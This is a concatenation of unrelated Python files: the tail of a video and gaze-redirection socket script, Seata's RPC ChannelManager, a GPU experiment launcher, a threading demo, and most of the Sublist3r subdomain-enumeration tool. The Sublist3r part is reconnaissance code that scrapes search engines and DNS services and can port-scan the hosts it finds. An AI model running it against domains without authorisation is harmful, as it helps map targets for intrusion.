data = pickle.dumps(imgencode, 0)
self.client_socket.sendall(struct.pack("L", len(data)) + data)
if (time.time() - t) > 1:
t = time.time()
k = cv2.waitKey(10)
if k == ord('q'):
data = pickle.dumps('stop')
self.client_socket.sendall(struct.pack("L", len(data))+data)
time.sleep(3)
cv2.destroyWindow(conf.uid)
self.client_socket.shutdown(socket.SHUT_RDWR)
self.client_socket.close()
vs.release()
self.L_sess.close()
self.R_sess.close()
break
elif k == ord('r'):
if redir:
redir = False
else:
redir = True
else:
pass
# In[ ]:
if __name__ == '__main__':
l = mp.Lock() # multi-process lock
v = mp.Array('i', [320,240]) # shared parameter
# start video receiver
# vs_thread = Thread(target=video_receiver, args=(conf.recver_port,))
vs_thread = mp.Process(target=video_receiver, args=(v,l))
vs_thread.start()
time.sleep(1)
gz_thread = mp.Process(target=gaze_redirection_system, args=(v,l))
gz_thread.start()
vs_thread.join()
gz_thread.join()
|
ChannelManager.py
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# @author jsbxyyx
# @since 1.0
import queue
import selectors
import socket
import sys
import threading
import time
from concurrent.futures import ThreadPoolExecutor
from loguru import logger
from seata.core.ByteBuffer import ByteBuffer
from seata.core.protocol.HeartbeatMessage import HeartbeatMessage
from seata.core.protocol.ProtocolConstants import ProtocolConstants
from seata.core.protocol.RpcMessage import RpcMessage
from seata.core.rpc.v1.ProtocolV1 import ProtocolV1
from seata.core.util.ClassUtil import ClassUtil
from seata.registry.Registry import RegistryFactory
class Channel:
def __init__(self, sock):
if not isinstance(sock, socket.socket):
raise TypeError('sock type error')
self.__sock = sock
self.__in_data = bytes()
self.__out_data = queue.Queue()
def get_sock(self):
return self.__sock
def append_in_data(self, data):
if not isinstance(data, bytes):
raise TypeError('append in data type error.' + type(data).__name__)
self.__in_data += data
def get_in_data(self):
return self.__in_data
def set_in_data(self, data):
if not isinstance(data, bytes):
raise TypeError('set data type error.' + type(data).__name__)
self.__in_data = data
def write(self, rpc_message):
if not isinstance(rpc_message, RpcMessage):
raise TypeError('channel write message type error.' + type(rpc_message).__name__)
self.__out_data.put_nowait(rpc_message)
def out_data_is_empty(self):
return self.__out_data.empty()
def poll_out_data(self):
return self.__out_data.get_nowait()
class ChannelManager:
def __init__(self, remote_client):
self.remote_client = remote_client
self.channels = {}
self.__sel = selectors.DefaultSelector()
self.protocol = ProtocolV1()
# TODO
self.executor = ThreadPoolExecutor(max_workers=16, thread_name_prefix="cm")
self.__boot = False
self.__cond = threading.Condition()
self.init()
def init(self):
threading.Thread(target=self.do_events, args=()).start()
threading.Thread(target=self.do_heart, args=()).start()
def acquire_channel(self, server_address):
if self.channels.get(server_address.to_string(), None) is not None:
return self.channels.get(server_address.to_string())
server_addr = (server_address.host, server_address.port)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(False)
sock.connect_ex(server_addr)
events = selectors.EVENT_READ | selectors.EVENT_WRITE
channel = Channel(sock)
self.__sel.register(sock, events, data=channel)
self.channels[server_address.to_string()] = channel
return channel
def do_events(self):
try:
if sys.platform == 'win32' and not self.__boot:
try:
self.__cond.acquire()
self.__cond.wait()
finally:
self.__cond.release()
while True:
events = self.__sel.select()
if events:
for key, mask in events:
self.service_connection(key, mask)
except KeyboardInterrupt:
logger.error("caught keyboard interrupt, exiting")
finally:
self.__sel.close()
def service_connection(self, key, mask):
sock = key.fileobj
channel = key.data
if mask & selectors.EVENT_READ:
recv_data = sock.recv(4096)
if len(recv_data) > 0:
channel.append_in_data(recv_data)
if len(recv_data) < 7:
return
t_bb = ByteBuffer.wrap(bytearray(channel.get_in_data()))
magic = bytearray(len(ProtocolConstants.MAGIC_CODE_BYTES))
t_bb.get(magic)
if magic != ProtocolConstants.MAGIC_CODE_BYTES:
logger.error("magic not 0xdada", magic)
return
t_bb.get_int8()
full_length = t_bb.get_int32()
if len(channel.get_in_data()) >= full_length:
buf = channel.get_in_data()[0:full_length]
channel.set_in_data(channel.get_in_data()[full_length:])
in_message = self.protocol.decode(ByteBuffer.wrap(bytearray(buf)))
if not isinstance(in_message.body, HeartbeatMessage):
logger.debug('in message : <{}> request_id : {} sock : {}'.format(
ClassUtil.get_simple_name(in_message.body), in_message.id, sock.getpeername()))
self.executor.submit(self.remote_client.message_handler.process, in_message)
else:
logger.info('sock unregister... {}', sock.getpeername())
self.__sel.unregister(sock)
sock.close()
if mask & selectors.EVENT_WRITE:
while not channel.out_data_is_empty():
out_message = channel.poll_out_data()
if not isinstance(out_message.body, HeartbeatMessage):
logger.debug(
'out message : <{}> request_id : {} sock : {}'.format(
ClassUtil.get_simple_name(out_message.body), out_message.id, sock.getpeername()))
try:
sock.send(self.protocol.encode(out_message))
except ConnectionAbortedError as e:
logger.error(e)
def get_avail_list(self, tx_service_group):
avail_list = RegistryFactory.get_registry().lookup(tx_service_group)
return avail_list
def reconnect(self, tx_service_group):
avail_list = self.get_avail_list(tx_service_group)
if avail_list is None or len(avail_list) == 0:
registry = RegistryFactory.get_registry()
cluster_name = registry.get_service_group(tx_service_group)
if cluster_name is None or len(cluster_name.strip()) == 0:
logger.error(
'can not get cluster name in registry config [{}{}], please make sure registry config correct'.format(
'service.vgroupMapping.', tx_service_group))
return
from seata.registry.FileRegistry import FileRegistry
if not isinstance(registry, FileRegistry):
logger.error(
'no available service found in cluster [{}], please make sure registry config correct and keep your seata server running'.format(
cluster_name))
return
for address in avail_list:
self.acquire_channel(address)
if not self.__boot:
try:
self.__cond.acquire()
self.__boot = True
self.__cond.notify_all()
finally:
self.__cond.release()
def do_heart(self):
while True:
try:
logger.debug('do heart channel size : [{}]'.format(len(self.channels.values())))
for idx, channel in enumerate(self.channels.values()):
hb = HeartbeatMessage(True)
rpc_message = RpcMessage.build_request_message(hb, ProtocolConstants.MSGTYPE_HEARTBEAT_REQUEST)
channel.write(rpc_message)
except Exception as e:
logger.error('heart error: {}', e)
finally:
try:
time.sleep(5)
except Exception:
pass
def get_channels(self):
if not self.__boot:
try:
self.__cond.acquire()
self.__cond.wait(15)
finally:
self.__cond.release()
return self.channels.values()
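# Usage sketch (assumption, not part of the original module): Channel pairs a
# non-blocking socket with an outgoing queue of RpcMessage objects, which
# ChannelManager drains when the selector reports EVENT_WRITE, e.g.
#   sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   sock.setblocking(False)
#   channel = Channel(sock)
#   hb = HeartbeatMessage(True)
#   channel.write(RpcMessage.build_request_message(hb, ProtocolConstants.MSGTYPE_HEARTBEAT_REQUEST))
#   while not channel.out_data_is_empty():
#       rpc_message = channel.poll_out_data()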
|
run_results.py
|
import numpy as np
import os
import copy
import threading
import argparse
from results import get_runs
##############################################
parser = argparse.ArgumentParser()
parser.add_argument('--print', type=int, default=0)
cmd_args = parser.parse_args()
##############################################
num_gpus = 4
counter = 0
def run_command(param):
global num_gpus, counter
if num_gpus == 0:
gpu = -1
else:
gpu = counter % num_gpus
counter = counter + 1
name = '%s_%f_%f_%s_%f_%f_%d_%d_%s' % (
param['benchmark'],
param['lr'],
param['eps'],
param['act'],
param['bias'],
param['dropout'],
param['dfa'],
param['sparse'],
param['init']
)
cmd = "python36 %s --gpu %d --epochs %d --batch_size %d --lr %f --eps %f --act %s --bias %f --dropout %f --dfa %d --sparse %d --rank %d --init %s --save %d --name %s" % (
param['benchmark'],
gpu,
param['epochs'],
param['batch_size'],
param['lr'],
param['eps'],
param['act'],
param['bias'],
param['dropout'],
param['dfa'],
param['sparse'],
param['rank'],
param['init'],
1,
name
)
if cmd_args.print:
print (cmd)
else:
os.system(cmd)
return
##############################################
runs = get_runs()
##############################################
num_runs = len(runs)
parallel_runs = num_gpus
for run in range(0, num_runs, parallel_runs):
threads = []
for parallel_run in range( min(parallel_runs, num_runs - run)):
args = runs[run + parallel_run]
t = threading.Thread(target=run_command, args=(args,))
threads.append(t)
t.start()
for t in threads:
t.join()
|
multi_threading.py
|
#-*- coding: utf-8 -*-
from threading import Thread
import time
def loop(idx, nsec):
print("start loop", idx, " at ", time.ctime())
time.sleep(nsec)
print("start loop", idx, " at ", time.ctime())
def main():
print("Process start at ", time.ctime())
thread0 = Thread(target=loop, args=(0, 4))
thread0.start()
thread1 = Thread(target=loop, args=(1, 2))
thread1.start()
thread0.join()
thread1.join()
print("Process done at ", time.ctime())
if "__main__" == __name__:
main()
|
sublist3r.py
|
#!/usr/bin/env python
# coding: utf-8
# Sublist3r v1.0
# By Ahmed Aboul-Ela - twitter.com/aboul3la
# modules in standard library
import re
import sys
import os
import argparse
import time
import hashlib
import random
import multiprocessing
import threading
import socket
import json
from collections import Counter
# external modules
from Sublist3r.subbrute import subbrute
import dns.resolver
import requests
# Python 2.x and 3.x compatibility
if sys.version > '3':
import urllib.parse as urlparse
import urllib.parse as urllib
else:
import urlparse
import urllib
# In case you cannot install some of the required development packages
# there's also an option to disable the SSL warning:
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except:
pass
# Check if we are running this on windows platform
is_windows = sys.platform.startswith('win')
# Console Colors
if is_windows:
# Windows deserves coloring too :D
G = '\033[92m' # green
Y = '\033[93m' # yellow
B = '\033[94m' # blue
R = '\033[91m' # red
W = '\033[0m' # white
try:
import win_unicode_console , colorama
win_unicode_console.enable()
colorama.init()
#Now the unicode will work ^_^
except:
# print("[!] Error: Coloring libraries not installed, no coloring will be used [Check the readme]")
G = Y = B = R = W = ''
pass
else:
G = '\033[92m' # green
Y = '\033[93m' # yellow
B = '\033[94m' # blue
R = '\033[91m' # red
W = '\033[0m' # white
def no_color():
global G, Y, B, R, W
G = Y = B = R = W = ''
def banner():
print("""%s
____ _ _ _ _ _____
/ ___| _ _| |__ | (_)___| |_|___ / _ __
\___ \| | | | '_ \| | / __| __| |_ \| '__|
___) | |_| | |_) | | \__ \ |_ ___) | |
|____/ \__,_|_.__/|_|_|___/\__|____/|_|%s%s
# Coded By Ahmed Aboul-Ela - @aboul3la
""" % (R, W, Y))
def parser_error(errmsg):
banner()
print("Usage: python " + sys.argv[0] + " [Options] use -h for help")
print(R + "Error: " + errmsg + W)
sys.exit()
def parse_args():
# parse the arguments
parser = argparse.ArgumentParser(epilog='\tExample: \r\npython ' + sys.argv[0] + " -d google.com")
parser.error = parser_error
parser._optionals.title = "OPTIONS"
parser.add_argument('-d', '--domain', help="Domain name to enumerate it's subdomains", required=True)
parser.add_argument('-b', '--bruteforce', help='Enable the subbrute bruteforce module', nargs='?', default=False)
parser.add_argument('-p', '--ports', help='Scan the found subdomains against specified tcp ports')
parser.add_argument('-v', '--verbose', help='Enable Verbosity and display results in realtime', nargs='?', default=False)
parser.add_argument('-t', '--threads', help='Number of threads to use for subbrute bruteforce', type=int, default=30)
parser.add_argument('-e', '--engines', help='Specify a comma-separated list of search engines')
parser.add_argument('-o', '--output', help='Save the results to text file')
parser.add_argument('-n', '--no-color', help='Output without color', default=False, action='store_true')
return parser.parse_args()
def write_file(filename, subdomains):
# saving subdomains results to output file
print("%s[-] Saving results to file: %s%s%s%s" % (Y, W, R, filename, W))
with open(str(filename), 'wt') as f:
for subdomain in subdomains:
f.write(subdomain + os.linesep)
def subdomain_sorting_key(hostname):
"""Sorting key for subdomains
This sorting key orders subdomains by their labels read right to left,
starting from the top-level domain, and moves the bare domain and 'www'
to the top of their group. For
example, the following list is sorted correctly:
[
'example.com',
'www.example.com',
'a.example.com',
'www.a.example.com',
'b.a.example.com',
'b.example.com',
'example.net',
'www.example.net',
'a.example.net',
]
"""
parts = hostname.split('.')[::-1]
if parts[-1] == 'www':
return parts[:-1], 1
return parts, 0
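# Usage sketch (illustrative, not part of the original script): the key above is
# meant to be passed to sorted(), e.g.
#   subdomains = sorted(subdomains, key=subdomain_sorting_key)
# which groups hosts by domain read right to left and keeps the bare domain and
# 'www' entries at the top of each group.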
class enumratorBase(object):
def __init__(self, base_url, engine_name, domain, subdomains=None, silent=False, verbose=True):
subdomains = subdomains or []
self.domain = urlparse.urlparse(domain).netloc
self.session = requests.Session()
self.subdomains = []
self.timeout = 25
self.base_url = base_url
self.engine_name = engine_name
self.silent = silent
self.verbose = verbose
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.8',
'Accept-Encoding': 'gzip',
}
self.print_banner()
def print_(self, text):
if not self.silent:
print(text)
return
def print_banner(self):
""" subclass can override this if they want a fancy banner :)"""
self.print_(G + "[-] Searching now in %s.." % (self.engine_name) + W)
return
def send_req(self, query, page_no=1):
url = self.base_url.format(query=query, page_no=page_no)
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception:
resp = None
return self.get_response(resp)
def get_response(self, response):
if response is None:
return "NULL"
return response.text if hasattr(response, "text") else response.content
def check_max_subdomains(self, count):
if self.MAX_DOMAINS == 0:
return False
return count >= self.MAX_DOMAINS
def check_max_pages(self, num):
if self.MAX_PAGES == 0:
return False
return num >= self.MAX_PAGES
# override
def extract_domains(self, resp):
""" chlid class should override this function """
return
# override
def check_response_errors(self, resp):
""" chlid class should override this function
The function should return True if there are no errors and False otherwise
"""
return True
def should_sleep(self):
"""Some enumrators require sleeping to avoid bot detections like Google enumerator"""
return
def generate_query(self):
""" chlid class should override this function """
return
def get_page(self, num):
""" chlid class that user different pagnation counter should override this function """
return num + 10
def enumerate(self, altquery=False):
flag = True
page_no = 0
prev_links = []
retries = 0
while flag:
query = self.generate_query()
count = query.count(self.domain) # finding the number of subdomains found so far
# if we have reached the maximum number of subdomains in the search query
# then we should move on to the next page
if self.check_max_subdomains(count):
page_no = self.get_page(page_no)
if self.check_max_pages(page_no): # maximum pages for Google to avoid getting blocked
return self.subdomains
resp = self.send_req(query, page_no)
# check if any error occurred
if not self.check_response_errors(resp):
return self.subdomains
links = self.extract_domains(resp)
# if the hyperlinks on the previous page are the same as on the current one, we may have reached the last page
if links == prev_links:
retries += 1
page_no = self.get_page(page_no)
# retry a few more times in case it is not actually the last page
if retries >= 3:
return self.subdomains
prev_links = links
self.should_sleep()
return self.subdomains
class enumratorBaseThreaded(multiprocessing.Process, enumratorBase):
def __init__(self, base_url, engine_name, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
enumratorBase.__init__(self, base_url, engine_name, domain, subdomains, silent=silent, verbose=verbose)
multiprocessing.Process.__init__(self)
self.q = q
return
def run(self):
domain_list = self.enumerate()
for domain in domain_list:
self.q.append(domain)
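# Usage sketch (assumption, not part of the original script): each engine below runs
# as a multiprocessing.Process and appends results to q, so a shared, append()-able
# container such as a Manager().list() is expected, e.g.
#   results = multiprocessing.Manager().list()
#   engine = GoogleEnum("http://example.com", q=results, silent=True, verbose=False)
#   engine.start()
#   engine.join()
#   print(list(results))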
class GoogleEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "https://google.com/search?q={query}&btnG=Search&hl=en-US&biw=&bih=&gbv=1&start={page_no}&filter=0"
self.engine_name = "Google"
self.MAX_DOMAINS = 11
self.MAX_PAGES = 200
super(GoogleEnum, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
self.q = q
return
def extract_domains(self, resp):
links_list = list()
link_regx = re.compile('<cite.*?>(.*?)<\/cite>')
try:
links_list = link_regx.findall(resp)
for link in links_list:
link = re.sub('<span.*>', '', link)
if not link.startswith('http'):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if subdomain and subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
def check_response_errors(self, resp):
if (type(resp) is str) and 'Our systems have detected unusual traffic' in resp:
self.print_(R + "[!] Error: Google probably now is blocking our requests" + W)
self.print_(R + "[~] Finished now the Google Enumeration ..." + W)
return False
return True
def should_sleep(self):
time.sleep(5)
return
def generate_query(self):
if self.subdomains:
fmt = 'site:{domain} -www.{domain} -{found}'
found = ' -'.join(self.subdomains[:self.MAX_DOMAINS - 2])
query = fmt.format(domain=self.domain, found=found)
else:
query = "site:{domain} -www.{domain}".format(domain=self.domain)
return query
class YahooEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "https://search.yahoo.com/search?p={query}&b={page_no}"
self.engine_name = "Yahoo"
self.MAX_DOMAINS = 10
self.MAX_PAGES = 0
super(YahooEnum, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
self.q = q
return
def extract_domains(self, resp):
link_regx2 = re.compile('<span class=" fz-.*? fw-m fc-12th wr-bw.*?">(.*?)</span>')
link_regx = re.compile('<span class="txt"><span class=" cite fw-xl fz-15px">(.*?)</span>')
links_list = []
try:
links = link_regx.findall(resp)
links2 = link_regx2.findall(resp)
links_list = links + links2
for link in links_list:
link = re.sub("<(\/)?b>", "", link)
if not link.startswith('http'):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if not subdomain.endswith(self.domain):
continue
if subdomain and subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
def should_sleep(self):
return
def get_page(self, num):
return num + 10
def generate_query(self):
if self.subdomains:
fmt = 'site:{domain} -domain:www.{domain} -domain:{found}'
found = ' -domain:'.join(self.subdomains[:77])
query = fmt.format(domain=self.domain, found=found)
else:
query = "site:{domain}".format(domain=self.domain)
return query
class AskEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'http://www.ask.com/web?q={query}&page={page_no}&qid=8D6EE6BF52E0C04527E51F64F22C4534&o=0&l=dir&qsrc=998&qo=pagination'
self.engine_name = "Ask"
self.MAX_DOMAINS = 11
self.MAX_PAGES = 0
enumratorBaseThreaded.__init__(self, base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
self.q = q
return
def extract_domains(self, resp):
links_list = list()
link_regx = re.compile('<p class="web-result-url">(.*?)</p>')
try:
links_list = link_regx.findall(resp)
for link in links_list:
if not link.startswith('http'):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
def get_page(self, num):
return num + 1
def generate_query(self):
if self.subdomains:
fmt = 'site:{domain} -www.{domain} -{found}'
found = ' -'.join(self.subdomains[:self.MAX_DOMAINS])
query = fmt.format(domain=self.domain, found=found)
else:
query = "site:{domain} -www.{domain}".format(domain=self.domain)
return query
class BingEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'https://www.bing.com/search?q={query}&go=Submit&first={page_no}'
self.engine_name = "Bing"
self.MAX_DOMAINS = 30
self.MAX_PAGES = 0
enumratorBaseThreaded.__init__(self, base_url, self.engine_name, domain, subdomains, q=q, silent=silent)
self.q = q
self.verbose = verbose
return
def extract_domains(self, resp):
links_list = list()
link_regx = re.compile('<li class="b_algo"><h2><a href="(.*?)"')
link_regx2 = re.compile('<div class="b_title"><h2><a href="(.*?)"')
try:
links = link_regx.findall(resp)
links2 = link_regx2.findall(resp)
links_list = links + links2
for link in links_list:
link = re.sub('<(\/)?strong>|<span.*?>|<|>', '', link)
if not link.startswith('http'):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
def generate_query(self):
if self.subdomains:
fmt = 'domain:{domain} -www.{domain} -{found}'
found = ' -'.join(self.subdomains[:self.MAX_DOMAINS])
query = fmt.format(domain=self.domain, found=found)
else:
query = "domain:{domain} -www.{domain}".format(domain=self.domain)
return query
class BaiduEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'https://www.baidu.com/s?pn={page_no}&wd={query}&oq={query}'
self.engine_name = "Baidu"
self.MAX_DOMAINS = 2
self.MAX_PAGES = 760
enumratorBaseThreaded.__init__(self, base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
self.querydomain = self.domain
self.q = q
return
def extract_domains(self, resp):
links = list()
found_newdomain = False
subdomain_list = []
link_regx = re.compile('<a.*?class="c-showurl".*?>(.*?)</a>')
try:
links = link_regx.findall(resp)
for link in links:
link = re.sub('<.*?>|>|<| ', '', link)
if not link.startswith('http'):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if subdomain.endswith(self.domain):
subdomain_list.append(subdomain)
if subdomain not in self.subdomains and subdomain != self.domain:
found_newdomain = True
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
if not found_newdomain and subdomain_list:
self.querydomain = self.findsubs(subdomain_list)
return links
def findsubs(self, subdomains):
count = Counter(subdomains)
subdomain1 = max(count, key=count.get)
count.pop(subdomain1, "None")
subdomain2 = max(count, key=count.get) if count else ''
return (subdomain1, subdomain2)
def check_response_errors(self, resp):
return True
def should_sleep(self):
time.sleep(random.randint(2, 5))
return
def generate_query(self):
if self.subdomains and self.querydomain != self.domain:
found = ' -site:'.join(self.querydomain)
query = "site:{domain} -site:www.{domain} -site:{found} ".format(domain=self.domain, found=found)
else:
query = "site:{domain} -site:www.{domain}".format(domain=self.domain)
return query
class NetcraftEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
self.base_url = 'https://searchdns.netcraft.com/?restriction=site+ends+with&host={domain}'
self.engine_name = "Netcraft"
super(NetcraftEnum, self).__init__(self.base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
self.q = q
return
def req(self, url, cookies=None):
cookies = cookies or {}
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout, cookies=cookies)
except Exception as e:
self.print_(e)
resp = None
return resp
def should_sleep(self):
time.sleep(random.randint(1, 2))
return
def get_next(self, resp):
link_regx = re.compile('<a.*?href="(.*?)">Next Page')
link = link_regx.findall(resp)
url = 'http://searchdns.netcraft.com' + link[0]
return url
def create_cookies(self, cookie):
cookies = dict()
cookies_list = cookie[0:cookie.find(';')].split("=")
cookies[cookies_list[0]] = cookies_list[1]
# hashlib.sha1 requires utf-8 encoded str
cookies['netcraft_js_verification_response'] = hashlib.sha1(urllib.unquote(cookies_list[1]).encode('utf-8')).hexdigest()
return cookies
def get_cookies(self, headers):
if 'set-cookie' in headers:
cookies = self.create_cookies(headers['set-cookie'])
else:
cookies = {}
return cookies
def enumerate(self):
start_url = self.base_url.format(domain='example.com')
resp = self.req(start_url)
cookies = self.get_cookies(resp.headers)
url = self.base_url.format(domain=self.domain)
while True:
resp = self.get_response(self.req(url, cookies))
self.extract_domains(resp)
if 'Next Page' not in resp:
return self.subdomains
break
url = self.get_next(resp)
self.should_sleep()
def extract_domains(self, resp):
links_list = list()
link_regx = re.compile('<a class="results-table__host" href="(.*?)"')
try:
links_list = link_regx.findall(resp)
for link in links_list:
subdomain = urlparse.urlparse(link).netloc
if not subdomain.endswith(self.domain):
continue
if subdomain and subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
class DNSdumpster(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'https://dnsdumpster.com/'
self.live_subdomains = []
self.engine_name = "DNSdumpster"
self.q = q
self.lock = None
super(DNSdumpster, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
return
def check_host(self, host):
is_valid = False
Resolver = dns.resolver.Resolver()
Resolver.nameservers = ['8.8.8.8', '8.8.4.4']
self.lock.acquire()
try:
ip = Resolver.query(host, 'A')[0].to_text()
if ip:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, host))
is_valid = True
self.live_subdomains.append(host)
except:
pass
self.lock.release()
return is_valid
def req(self, req_method, url, params=None):
params = params or {}
headers = dict(self.headers)
headers['Referer'] = 'https://dnsdumpster.com'
try:
if req_method == 'GET':
resp = self.session.get(url, headers=headers, timeout=self.timeout)
else:
resp = self.session.post(url, data=params, headers=headers, timeout=self.timeout)
except Exception as e:
self.print_(e)
resp = None
return self.get_response(resp)
def get_csrftoken(self, resp):
csrf_regex = re.compile('<input type="hidden" name="csrfmiddlewaretoken" value="(.*?)">', re.S)
token = csrf_regex.findall(resp)[0]
return token.strip()
def enumerate(self):
self.lock = threading.BoundedSemaphore(value=70)
resp = self.req('GET', self.base_url)
token = self.get_csrftoken(resp)
params = {'csrfmiddlewaretoken': token, 'targetip': self.domain}
post_resp = self.req('POST', self.base_url, params)
self.extract_domains(post_resp)
for subdomain in self.subdomains:
t = threading.Thread(target=self.check_host, args=(subdomain,))
t.start()
t.join()
return self.live_subdomains
def extract_domains(self, resp):
tbl_regex = re.compile('<a name="hostanchor"><\/a>Host Records.*?<table.*?>(.*?)</table>', re.S)
link_regex = re.compile('<td class="col-md-4">(.*?)<br>', re.S)
links = []
try:
results_tbl = tbl_regex.findall(resp)[0]
except IndexError:
results_tbl = ''
links_list = link_regex.findall(results_tbl)
links = list(set(links_list))
for link in links:
subdomain = link.strip()
if not subdomain.endswith(self.domain):
continue
if subdomain and subdomain not in self.subdomains and subdomain != self.domain:
self.subdomains.append(subdomain.strip())
return links
class Virustotal(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'https://www.virustotal.com/ui/domains/{domain}/subdomains'
self.engine_name = "Virustotal"
self.q = q
super(Virustotal, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
self.url = self.base_url.format(domain=self.domain)
return
# the main send_req need to be rewritten
def send_req(self, url):
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception as e:
self.print_(e)
resp = None
return self.get_response(resp)
# once the send_req is rewritten we don't need to call this function, the stock one should be ok
def enumerate(self):
while self.url != '':
resp = self.send_req(self.url)
resp = json.loads(resp)
if 'error' in resp:
self.print_(R + "[!] Error: Virustotal probably now is blocking our requests" + W)
break
if 'links' in resp and 'next' in resp['links']:
self.url = resp['links']['next']
else:
self.url = ''
self.extract_domains(resp)
return self.subdomains
def extract_domains(self, resp):
#resp is already parsed as json
try:
for i in resp['data']:
if i['type'] == 'domain':
subdomain = i['id']
if not subdomain.endswith(self.domain):
continue
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
class ThreatCrowd(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'https://www.threatcrowd.org/searchApi/v2/domain/report/?domain={domain}'
self.engine_name = "ThreatCrowd"
self.q = q
super(ThreatCrowd, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
return
def req(self, url):
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception:
resp = None
return self.get_response(resp)
def enumerate(self):
url = self.base_url.format(domain=self.domain)
resp = self.req(url)
self.extract_domains(resp)
return self.subdomains
def extract_domains(self, resp):
try:
links = json.loads(resp)['subdomains']
for link in links:
subdomain = link.strip()
if not subdomain.endswith(self.domain):
continue
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception as e:
pass
class CrtSearch(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'https://crt.sh/?q=%25.{domain}'
self.engine_name = "SSL Certificates"
self.q = q
super(CrtSearch, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
return
def req(self, url):
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception:
resp = None
return self.get_response(resp)
def enumerate(self):
url = self.base_url.format(domain=self.domain)
resp = self.req(url)
if resp:
self.extract_domains(resp)
return self.subdomains
def extract_domains(self, resp):
link_regx = re.compile('<TD>(.*?)</TD>')
try:
links = link_regx.findall(resp)
for link in links:
link = link.strip()
subdomains = []
if '<BR>' in link:
subdomains = link.split('<BR>')
else:
subdomains.append(link)
for subdomain in subdomains:
if not subdomain.endswith(self.domain) or '*' in subdomain:
continue
if '@' in subdomain:
subdomain = subdomain[subdomain.find('@')+1:]
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception as e:
print(e)
pass
class PassiveDNS(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'https://api.sublist3r.com/search.php?domain={domain}'
self.engine_name = "PassiveDNS"
self.q = q
